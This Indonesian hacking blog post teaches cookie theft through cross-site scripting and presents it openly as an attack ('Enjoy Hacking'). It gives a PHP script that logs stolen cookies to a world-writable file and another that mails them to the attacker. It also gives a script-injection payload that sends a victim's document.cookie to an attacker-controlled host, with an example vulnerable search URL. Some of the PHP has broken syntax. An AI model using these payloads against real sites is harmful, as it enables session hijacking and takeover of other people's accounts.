Pin It

Pencurian cookie dengan XSS


XSS adalah sebuah kerentanan siitus yang sering saya jumpai pada beberapa situs. Namun kebanyakan Security Researcher memasukan script dengan puncurian cookie. Cookie bisa digunakan untuk mendapatkan Username dan password user, login tanpa harus username dan password, cookie sendiri bisa untuk mendapatkan akun facebook dengan menggunakan tools Wireshark,  tanpa harus mengetahui email dan password korban dengan memanfaatkan Cookie tersebut. Atau di kenal dengan metode Snifers anda bisa mendownload wireshark di postingan saya sebelumnya di top tools Snifers.




How to stolen cookie 


Disini saya akan menggunakan tiga metode untuk pencurian cookie yaitu :

  • Membuat file PHP
  • Membuat file Javascript
  • Mengirim ke email
1. Untuk pencurian cookie dengan metode PHP anda perlu sebuah web hosting gratis dengan support PHP, karena script PHP akan kita upload pada web hosting tersebut.

Untuk membuat file PHP dengan pencurian cookie anda bisa mengcopy script di bawah ini :

<!–?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen(“log.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?–>

Selanjutnya simpan script tersebut dengan nama terserah anda format file extensi .php,  misal curi.php

setelah file php dibuat selanjutnya membuat file log.txt,  buka program Notepad dan simpan dengan nama log.txt.


setelah dua file terbuat.
  • Curi.php
  • log.txt
selanjutnya silakan anda upload kedua file tersebut di web hosting gratisan dan ubah CHMOD menjadi 777. Jadi ketika anda memanggil file curi.php, history cookie akan di simpan pada log.txt.


2. Metode yang kedua adalah membuat file javascript dengan pencurian cookie. Berbeda dengan file php javascript akan menampilkan pop-up pada browser , seperti menampilkan Pop-up XSS pada dasarnya. Untuk membuat file cookie dengan extensi  Javascript, silakan anda copy script dibawah ini :

document.write ("Ini adalah Kerentanan XSS menggunakan javascript " + document.cookie);
alert ("Found XSS pada situs ini...! - |@nasrulseven| " + document.cookie);


Simpan dengan nama terserah anda dengan extensi .js, misal xss.js, dan silakan anda upload file javascript terbsut di web hosting yang sama anda buat tadi. Maka hasil code javascript tersebut akan mucul pop-up seperti gambar di bawah ini.




3. Metode yang terakhir adalah mengirimkan cookie tersebut ke alamat email anda. Untuk membuat cookie bisa di kirim ke alamat email anda  silakan copy script php di bawah ini.

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail(“email_anda@gmail.com”, “Stolen
Cookie XSS”, $cookie);
?>

Untuk yang tulisan dengan font merah silakan anda ganti dengan email anda. Jika email sudah di ganti silakan anda simpan dengan nama send.php atau terserah anda, dan upload. Cookie akan dikirimkan ke email anda ketika anda panggil file send.php. dan hasil cookie akan seperti gambar dibawah.




Untuk memanggil file tersebut bisa gunakan script :

<script>location.href=‘http://www.situsagan.com/file.php?cookie=’+document.cookie;</script>

 Contoh :

htpp://www.situsrentan.com/index.php?search=<script>location.href = ‘http://www.situsgan.com/file.php?cookie=’+document.cookie;</script>


Untuk tiga metode file CHMOD 777.




Enjoy Hacking,,,,

Kindly Bookmark this Post using your favorite Bookmarking service:
Technorati Digg This Stumble Stumble Facebook Twitter

0 comments:

Blogger Tricks And TipsComment here

DMCA.com

Blog Archive

 

Site info

Free counters! ping fast  my blog, website, or RSS feed for Free Yahoo bot last visit powered by MyPagerank.Net Msn bot last visit powered by MyPagerank.Net Text Backlink Exchanges Kostenlose Backlinks bei http://www.backlink-clever.de

| Hackers Trix 7 © 2010. All Rights Reserved | Template Style by Lord HTML | Design by MBT | Back To Top |

Your Text Link Here